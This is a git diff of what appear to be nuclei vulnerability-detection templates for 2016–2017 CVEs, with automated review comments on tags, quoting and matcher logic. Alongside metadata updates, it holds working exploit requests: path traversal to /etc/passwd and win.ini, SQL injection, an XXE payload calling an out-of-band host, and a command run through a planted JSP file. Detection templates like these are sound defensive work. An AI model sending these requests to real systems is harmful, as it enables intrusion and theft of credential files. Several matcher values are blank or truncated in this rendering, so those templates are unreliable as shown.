header diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 4c2bf4c1db..b62d9b6141 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml 
@@ -10,15 +10,20 @@ info: - https://tanzu.vmware.com/security/cve-2016-4977 - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 - https://pivotal.io/security/cve-2016-4977 + - http://www.openwall.com/lists/oss-security/2019/10/16/1 remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring + epss-score: 0.03345 + cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: pivotal + product: spring_security_oauth + tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring http: - method: GET diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index b3096f1395..fb3eb43ba9 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -13,10 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-5649 - cwe-id: CWE-200 - tags: cve,cve2016,iot,netgear,router,packetstorm + cwe-id: CWE-200,CWE-319 + epss-score: 0.10584 + cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: dgn2200_firmware + tags: cve,cve2016,iot,netgear,router,packetstorm http: - raw: @@ -27,19 +31,19 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "Smart Wizard Result " + - type: status status: - 200 - - type: word - words: - - "Smart Wizard Result " - part: body - extractors: - type: regex name: password - part: body group: 1 regex: - 'Success "([a-z]+)"' + part: body diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 59edb97f43..bedd2a5e56 100644 --- a/http/cves/2016/CVE-2016-6195.yaml 
+++ b/http/cves/2016/CVE-2016-6195.yaml @@ -3,23 +3,28 @@ id: CVE-2016-6195 info: name: vBulletin <= 4.2.3 - SQL Injection author: MaStErChO - severity: high + severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 - - https://www.securityfocus.com/bid/94312 - https://enumerated.wordpress.com/2016/07/11/1/ + - http://www.vbulletin.org/forum/showthread.php?t=322848 + - https://github.com/drewlong/vbully classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-6195 cwe-id: CWE-89 + epss-score: 0.00284 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: max-request: 6 shodan-query: title:"Powered By vBulletin" verified: "true" + vendor: vbulletin + product: vbulletin tags: cve,cve2016,vbulletin,sqli,forum,edb http: @@ -33,6 +38,7 @@ http: - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index d7827955b4..47de0f0ac0 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml 
@@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://www.kb.cert.org/vuls/id/582384 + - http://kb.netgear.com/000036386/CVE-2016-582384 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 - tags: cve,cve2016,netgear,rce,iot,kev + epss-score: 0.97471 + cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: d6220_firmware + tags: cve,cve2016,netgear,rce,iot,kev http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 4b2595f051..cfce9fa1bf 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -9,14 +9,20 @@ info: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6601 + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - tags: edb,cve,cve2016,zoho,lfi,webnms + epss-score: 0.97521 + cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: webnms_framework + tags: edb,cve,cve2016,zoho,lfi,webnms http: - method: GET diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 39dbc07bf1..db2bc880c1 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml 
@@ -9,28 +9,34 @@ info: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - - http://web.archive.org/web/20210516181625/https://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - tags: msf,cve,cve2016,lfi,auth,bypass + epss-score: 0.97039 + cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 + vendor: trendmicro + product: threat_discovery_appliance + tags: msf,cve,cve2016,lfi,auth,bypass http: - method: GET path: - "{{BaseURL}}/cgi-bin/logoff.cgi" + headers: Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" + matchers-condition: and matchers: + - type: word + part: body + words: + - "Memory map" + - type: status status: - 200 - - type: word - words: - - "Memory map" - part: body diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 83618c205c..41a91c1448 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -11,6 +11,7 @@ info: - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 + - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras remediation: | Upgrade to the latest version of the firmware provided by Sony. classification: @@ -18,9 +19,13 @@ info: cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 - tags: sony,backdoor,unauth,telnet,iot,camera + epss-score: 0.00202 + cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sony + product: snc_series_firmware + tags: sony,backdoor,unauth,telnet,iot,camera http: - method: GET 
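Review bot: In http/cves/2016/CVE-2016-7834.yaml the relocated `tags: sony,backdoor,unauth,telnet,iot,camera` line still carries no `cve`/`cve2016` tag, unlike every other template touched in this diff, so tag-based selection (for example `-tags cve2016`) would skip a template that lives under cves/2016 and declares `cve-id: CVE-2016-7834`. Since the commit already rewrites that line, this is the natural place to align it with the siblings: `tags: cve,cve2016,sony,backdoor,unauth,telnet,iot,camera`. The rest of the template's info block starts above the hunk, so I cannot rule out that the tags are applied some other way, but nothing in the hunk suggests it.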
diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 7454a2b6c9..f57462717a 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -11,14 +11,19 @@ info: - https://core.spip.net/projects/spip/repository/revisions/23201 - https://core.spip.net/projects/spip/repository/revisions/23200 - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - http://www.openwall.com/lists/oss-security/2016/10/05/17 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-7981 cwe-id: CWE-79 - tags: cve,cve2016,xss,spip + epss-score: 0.00258 + cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: spip + product: spip + tags: cve,cve2016,xss,spip http: - method: GET @@ -28,15 +33,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 50bc78e888..0e493c6378 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - tags: cve2016,aruba,xss,edb,cve + epss-score: 0.00249 + cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: airwave + tags: cve2016,aruba,xss,edb,cve http: - method: GET @@ -26,17 +30,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 99941684d2..dac4e960bc 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml 
@@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 - tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf + epss-score: 0.03588 + cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index ae3496d18c..4d94a25c8a 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 - tags: oracle,glassfish,lfi,edb,cve,cve2017 + epss-score: 0.97522 + cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 + vendor: oracle + product: glassfish_server + tags: oracle,glassfish,lfi,edb,cve,cve2017 http: - method: GET @@ -27,6 +31,7 @@ http: - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index fbea33fe21..1bbc8eeac8 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000029 cwe-id: CWE-200 - tags: cve,cve2017,glassfish,oracle,lfi + epss-score: 0.00387 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 + vendor: oracle + product: glassfish_server + tags: cve,cve2017,glassfish,oracle,lfi http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 2eac717189..721faefdf7 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml 
@@ -14,18 +14,21 @@ info: cvss-score: 6.1 cve-id: CVE-2017-1000163 cwe-id: CWE-601 - tags: cve,cve2017,redirect,phoenix + epss-score: 0.00151 + cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phoenixframework + product: phoenix + tags: cve,cve2017,redirect,phoenix http: - method: GET - path: - '{{BaseURL}}/?redirect=/\interact.sh' matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 239420d1ed..31817b86cf 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -15,25 +15,30 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 + epss-score: 0.73129 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* - epss-score: 0.74745 - tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm metadata: max-request: 1 + vendor: jqueryfiletree_project + product: jqueryfiletree + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm http: - method: POST path: - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and matchers: - type: word + part: body words: - "
  • " - "passwd
  • " condition: and - part: body + - type: status status: - 200 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index e4749942a5..11918414a4 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -10,14 +10,19 @@ info: - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 + - https://cryptosense.com/weak-encryption-flaw-in-primefaces/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - tags: cve,cve2017,primetek,rce,injection,kev + epss-score: 0.97108 + cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: primetek + product: primefaces + tags: cve,cve2017,primetek,rce,injection,kev http: - raw: @@ -32,6 +37,6 @@ http: matchers: - type: word + part: header words: - 'Mogwailabs: CHECKCHECK' - part: header diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 6bbf479445..aca96fe8e0 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -10,14 +10,19 @@ info: - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 + - http://www.securitytracker.com/id/1038940 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2017-10075 + epss-score: 0.00409 + cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 2 google-query: inurl:"/cs/idcplg" verified: true + vendor: oracle + product: webcenter_content tags: cve,cve2017,xss,oracle http: 
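Review bot: The new `body: "dir=%2Fetc%2F&onlyFiles=true"` changes what the POST returns, but the word matcher paired with it is carried over unchanged (its literal values are garbled in this rendering, so they cannot be checked here). If `onlyFiles=true` makes the connector emit a files-only listing, confirm that `passwd` and the surrounding markup the matcher expects still appear in that response, otherwise the new `matchers-condition: and` together with the 200 status check will never fire. A one-line comment above `body:` naming the expected listing markup would make that dependency visible to the next maintainer.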
@@ -27,6 +32,7 @@ http: - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 711d984e34..e60db1cf4b 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -11,13 +11,18 @@ info: - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 + - http://www.securitytracker.com/id/1039608 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 - tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle + epss-score: 0.97429 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: weblogic_server + tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle http: - raw: @@ -53,7 +58,6 @@ http: - - | POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: {{Hostname}} @@ -83,6 +87,7 @@ http: stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 47f6696f84..f1358975ae 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-10974 cwe-id: CWE-22 - tags: edb,cve,cve2017,yaws,lfi + epss-score: 0.96161 + cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: yaws + product: yaws + tags: edb,cve,cve2017,yaws,lfi http: - method: GET 
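Review bot: `matchers-condition: and` changes the template's matching semantics — nuclei treats an absent key as `or` — while the matcher list it governs continues outside this hunk, so it cannot be confirmed here that every remaining matcher fires on a vulnerable response. With `stop-at-first-match: true` and only `- type: word` visible, check that a status or header matcher now required under `and` does not suppress a hit the old `or` accepted. The same implicit-`or`-to-`and` switch with matchers outside the hunk appears in CVE-2017-17562 and CVE-2017-5487; the CVE-2017-12637 and CVE-2017-14849 hunks show both of their matchers and look consistent.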
@@ -26,6 +30,10 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - '!contains(tolower(body), " <% @@ -45,6 +48,9 @@ http: } %> + headers: + Content-Type: application/x-www-form-urlencoded + - method: GET path: - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 62e33bc1bf..15bba35a88 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -1,4 +1,4 @@ -id: CVE-2017-12617 +id: "CVE-2017-12617" info: name: Apache Tomcat - Remote Code Execution @@ -11,14 +11,20 @@ info: - https://github.com/cyberheartmi9/CVE-2017-12617 - https://www.exploit-db.com/exploits/43008 - https://nvd.nist.gov/vuln/detail/CVE-2017-12617 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.3 + cvss-score: 8.1 + cve-id: "CVE-2017-12617" cwe-id: CWE-434 + epss-score: 0.97541 + cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 shodan-query: html:"Apache Tomcat" + vendor: apache + product: tomcat tags: cve,cve2017,tomcat,apache,rce,kev,intrusive http: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index e367edb09f..d3145ab7a8 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml 
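Review bot: In CVE-2017-12617, `id: "CVE-2017-12617"` and `cve-id: "CVE-2017-12617"` are now double-quoted while every other template in this diff leaves them plain (for example `cve-id: CVE-2017-12629` in the next file); both forms parse to the same string, but the repository is otherwise consistently unquoted, so prefer `id: CVE-2017-12617` and `cve-id: CVE-2017-12617`. The `cvss-score` correction from 8.3 to 8.1 agrees with the `AC:H` vector on the line above it.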
@@ -10,36 +10,39 @@ info: - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 + - http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97449 - tags: oast,xxe,vulhub,cve,cve2017,solr,apache + epss-score: 0.97491 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: solr + tags: oast,xxe,vulhub,cve,cve2017,solr,apache http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - - | GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1 Host: {{Hostname}} matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" extractors: - type: regex - internal: true name: core group: 1 regex: - '"name"\:"(.*?)"' + internal: true diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 6ddb4d7ad9..86bd636b7b 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml 
@@ -8,16 +8,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E - - http://web.archive.org/web/20210414010253/https://www.securityfocus.com/bid/101868 - https://security.gentoo.org/glsa/201711-16 + - https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html + - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - tags: cve,cve2017,couchdb,apache + epss-score: 0.97536 + cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: couchdb + tags: cve,cve2017,couchdb,apache,intrusive http: - raw: @@ -39,15 +44,15 @@ http: - type: word part: header words: - - "application/json" + - application/json - "Location:" - type: word part: body words: - - "org.couchdb.user:poc" - - "conflict" - - "Document update conflict" + - org.couchdb.user:poc + - conflict + - Document update conflict - type: status status: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 14e05bd5a4..dfe34e0048 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml 
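Review bot: In the second CVE-2017-12635 hunk `- application/json` becomes a plain scalar while `- "Location:"` directly below stays quoted (it has to, since a trailing colon would otherwise make the item a mapping key), leaving the same list in mixed styles; keep the three body words and `application/json` quoted as they were. The `intrusive` tag added to `tags:` fits the matcher's expectation of a `Document update conflict` response, which implies the request writes a document.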
@@ -15,25 +15,29 @@ info: cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:* epss-score: 0.00648 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 + vendor: sap + product: netweaver_application_server_java tags: cve,cve2017,sap,lfi,java,traversal http: - method: GET path: - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "WEB-INF" - "META-INF" condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 9852dc47d1..e543208310 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -11,14 +11,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 - tags: xss,django,cve,cve2017 + epss-score: 0.00219 + cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: djangoproject + product: django + tags: xss,django,cve,cve2017 http: - method: GET @@ -28,15 +33,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 08f1a07640..4934a266ec 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml 
@@ -15,9 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2017-14135 cwe-id: CWE-78 + epss-score: 0.96679 + cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Dreambox WebControl" + vendor: dreambox + product: opendreambox tags: cve2017,dreambox,rce,oast,edb,cve http: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 62549778a6..b9d8e3ff74 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -11,16 +11,22 @@ info: - https://fortiguard.com/advisory/FG-IR-17-242 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-14186 cwe-id: CWE-79 + epss-score: 0.02948 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: port:10443 http.favicon.hash:945408572 verified: true + vendor: fortinet + product: fortios tags: cve,cve2017,fortigate,xss,fortinet + http: - method: GET path: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 81b8eb1419..5c3543cffa 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml 
